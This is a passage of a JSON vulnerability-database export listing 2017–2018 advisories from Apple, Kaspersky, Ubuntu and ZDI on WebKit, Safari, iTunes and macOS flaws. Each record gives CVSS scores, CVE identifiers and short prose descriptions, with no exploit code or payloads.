"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-17T12:29:37", "title": "About the security content of macOS High Sierra 10.13.3, Security Update 2018-001 Sierra, and Security Update 2018-001 El Capitan - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754", "CVE-2018-4083", "CVE-2018-4100", "CVE-2018-4092", "CVE-2018-4082", "CVE-2018-4091", "CVE-2018-4147", "CVE-2017-13889", "CVE-2017-8817", "CVE-2017-5708", "CVE-2018-4298", "CVE-2018-4093", "CVE-2018-4086", "CVE-2017-5705", "CVE-2018-4169", "CVE-2017-8816", "CVE-2018-4098", "CVE-2018-4088", "CVE-2018-4094", "CVE-2018-4096", "CVE-2018-4084", "CVE-2018-4097", "CVE-2018-4089", "CVE-2018-4090", "CVE-2017-7830", "CVE-2018-4085", "CVE-2018-4189"], "modified": "2018-11-17T12:29:37", "id": "APPLE:HT208465", "href": "https://support.apple.com/kb/HT208465", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2021-08-18T11:13:01", "description": "### *Detect date*:\n01/23/2018\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple memory corruption vulnerabilities were found in Apple iTunes. By exploiting this vulnerability malicious users can execite arbitrary code. This vulnerability can be exploited remotely via a specially crafted webpage.\n\n### *Affected products*:\nApple iTunes earlier than 12.7.3\n\n### *Solution*:\nUpdate to latest version \n[Download iTunes](<https://www.apple.com/itunes/download/>)\n\n### *Original advisories*:\n[About the security content of iTunes 12.7.3 for Windows](<https://support.apple.com/en-us/HT208474>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apple iTunes](<https://threats.kaspersky.com/en/product/Apple-iTunes/>)\n\n### *CVE-IDS*:\n[CVE-2018-4088](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4088>)6.8High \n[CVE-2018-4096](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4096>)6.8High", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-23T00:00:00", "type": "kaspersky", "title": "KLA11280 Multiple vulnerabilities in Apple iTunes", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4088", "CVE-2018-4096"], "modified": "2020-06-03T00:00:00", "id": "KLA11280", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11280/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-18T11:13:02", "description": "### *Detect date*:\n12/06/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Apple iTunes. Malicious users can exploit these vulnerabilities to execute arbitrary code and obtain sensitive information.\n\n### *Affected products*:\nApple iTunes earlier than 12.7.2\n\n### *Solution*:\nUpdate to latest version \n[Download iTunes](<https://www.apple.com/itunes/download/>)\n\n### *Original advisories*:\n[About the security content of iTunes 12.7.2 for Windows](<https://support.apple.com/en-us/HT208326>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apple iTunes](<https://threats.kaspersky.com/en/product/Apple-iTunes/>)\n\n### *CVE-IDS*:\n[CVE-2017-15422](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15422>)4.3Warning \n[CVE-2017-7165](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7165>)6.8High \n[CVE-2017-13870](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13870>)6.8High \n[CVE-2017-7172](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7172>)9.3Critical \n[CVE-2017-13884](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13884>)6.8High \n[CVE-2017-13885](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13885>)6.8High \n[CVE-2017-7156](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7156>)6.8High \n[CVE-2017-7157](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7157>)6.8High \n[CVE-2017-13856](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13856>)6.8High \n[CVE-2017-7160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7160>)6.8High \n[CVE-2017-13864](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13864>)4.3Warning \n[CVE-2017-7153](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7153>)5.8High \n[CVE-2017-13866](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13866>)6.8High", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-06T00:00:00", "type": "kaspersky", "title": "KLA11279 Multiple vulnerabilities in Apple iTunes", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13864", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-15422", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7165", "CVE-2017-7172"], "modified": "2020-06-03T00:00:00", "id": "KLA11279", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11279/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2022-01-22T11:54:13", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is\naffected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is\naffected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is\naffected. watchOS before 4.2 is affected. The issue involves the \"WebKit\"\ncomponent. It allows remote attackers to execute arbitrary code or cause a\ndenial of service (memory corruption and application crash) via a crafted\nweb site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-31T00:00:00", "type": "ubuntucve", "title": "CVE-2017-13884", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884"], "modified": "2017-12-31T00:00:00", "id": "UB:CVE-2017-13884", "href": "https://ubuntu.com/security/CVE-2017-13884", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-22T11:54:13", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is\naffected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is\naffected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is\naffected. The issue involves the \"WebKit\" component. It allows remote\nattackers to execute arbitrary code or cause a denial of service (memory\ncorruption and application crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-31T00:00:00", "type": "ubuntucve", "title": "CVE-2017-13885", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13885"], "modified": "2017-12-31T00:00:00", "id": "UB:CVE-2017-13885", "href": "https://ubuntu.com/security/CVE-2017-13885", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-21T20:42:27", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is\naffected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is\naffected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is\naffected. watchOS before 4.2 is affected. The issue involves the \"WebKit\"\ncomponent. It allows remote attackers to spoof user-interface information\n(about whether the entire content is derived from a valid TLS session) via\na crafted web site that sends a 401 Unauthorized redirect.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2018-01-30T00:00:00", "type": "ubuntucve", "title": "CVE-2017-7153", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7153"], "modified": "2018-01-30T00:00:00", "id": "UB:CVE-2017-7153", "href": "https://ubuntu.com/security/CVE-2017-7153", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-01-22T11:54:12", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is\naffected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is\naffected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is\naffected. watchOS before 4.2 is affected. The issue involves the \"WebKit\"\ncomponent. It allows remote attackers to execute arbitrary code or cause a\ndenial of service (memory corruption and application crash) via a crafted\nweb site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-31T00:00:00", "type": "ubuntucve", "title": "CVE-2017-7165", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7165"], "modified": "2017-12-31T00:00:00", "id": "UB:CVE-2017-7165", "href": "https://ubuntu.com/security/CVE-2017-7165", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-22T11:54:13", "description": "An issue was discovered in certain Apple products. Safari before 11.0.2 is\naffected. The issue involves the \"WebKit Web Inspector\" component. It\nallows remote attackers to execute arbitrary code via special characters\nthat trigger command injection.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-31T00:00:00", "type": "ubuntucve", "title": "CVE-2017-7161", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7161"], "modified": "2017-12-31T00:00:00", "id": "UB:CVE-2017-7161", "href": "https://ubuntu.com/security/CVE-2017-7161", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-22T11:53:44", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is\naffected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is\naffected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is\naffected. The issue involves the \"WebKit\" component. It allows remote\nattackers to execute arbitrary code or cause a denial of service (memory\ncorruption and application crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-30T00:00:00", "type": "ubuntucve", "title": "CVE-2017-7160", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7160"], "modified": "2018-01-30T00:00:00", "id": "UB:CVE-2017-7160", "href": "https://ubuntu.com/security/CVE-2017-7160", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T11:50:02", "description": "An issue was discovered in certain Apple products. iOS before 11.2.5 is\naffected. macOS before 10.13.3 is affected. Safari before 11.0.3 is\naffected. tvOS before 11.2.5 is affected. The issue involves the \"WebKit\"\ncomponent. It allows remote attackers to execute arbitrary code or cause a\ndenial of service (memory corruption and application crash) via a crafted\nweb site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-03T00:00:00", "type": "ubuntucve", "title": "CVE-2018-4089", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4089"], "modified": "2018-04-03T00:00:00", "id": "UB:CVE-2018-4089", "href": "https://ubuntu.com/security/CVE-2018-4089", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-21T20:42:29", "description": "An issue was discovered in certain Apple products. iOS before 11.2.5 is\naffected. macOS before 10.13.3 is affected. Safari before 11.0.3 is\naffected. iCloud before 7.3 on Windows is affected. iTunes before 12.7.3 on\nWindows is affected. tvOS before 11.2.5 is affected. watchOS before 4.2.2\nis affected. The issue involves the \"WebKit\" component. It allows remote\nattackers to execute arbitrary code or cause a denial of service (memory\ncorruption and application crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-29T00:00:00", "type": "ubuntucve", "title": "CVE-2018-4088", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4088"], "modified": "2018-01-29T00:00:00", "id": "UB:CVE-2018-4088", "href": "https://ubuntu.com/security/CVE-2018-4088", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-21T20:42:29", "description": "An issue was discovered in certain Apple products. iOS before 11.2.5 is\naffected. macOS before 10.13.3 is affected. Safari before 11.0.3 is\naffected. iCloud before 7.3 on Windows is affected. iTunes before 12.7.3 on\nWindows is affected. tvOS before 11.2.5 is affected. watchOS before 4.2.2\nis affected. The issue involves the \"WebKit\" component. It allows remote\nattackers to execute arbitrary code or cause a denial of service (memory\ncorruption and application crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-29T00:00:00", "type": "ubuntucve", "title": "CVE-2018-4096", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4096"], "modified": "2018-01-29T00:00:00", "id": "UB:CVE-2018-4096", "href": "https://ubuntu.com/security/CVE-2018-4096", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2022-01-31T21:54:40", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the Math.clz32 function. By performing actions in JavaScript, an attacker can trigger a type confusion condition. An attacker can leverage this vulnerability to execute code under the context of the current process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-07T00:00:00", "type": "zdi", "title": "(Pwn2Own) Apple Safari DFG JIT Type Confusion Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884"], "modified": "2018-02-07T00:00:00", "id": "ZDI-18-153", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-153/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T21:54:39", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of an object during the enumeration of properties. By performing actions in JavaScript, an attacker can trigger a type confusion condition. An attacker can leverage this vulnerability to execute code under the context of the current process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-07T00:00:00", "type": "zdi", "title": "(Pwn2Own) Apple Safari DFG JIT Type Confusion Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13885"], "modified": "2018-02-07T00:00:00", "id": "ZDI-18-155", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-155/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T21:54:42", "description": "This vulnerability allows remote attackers to execute arbitrary code on 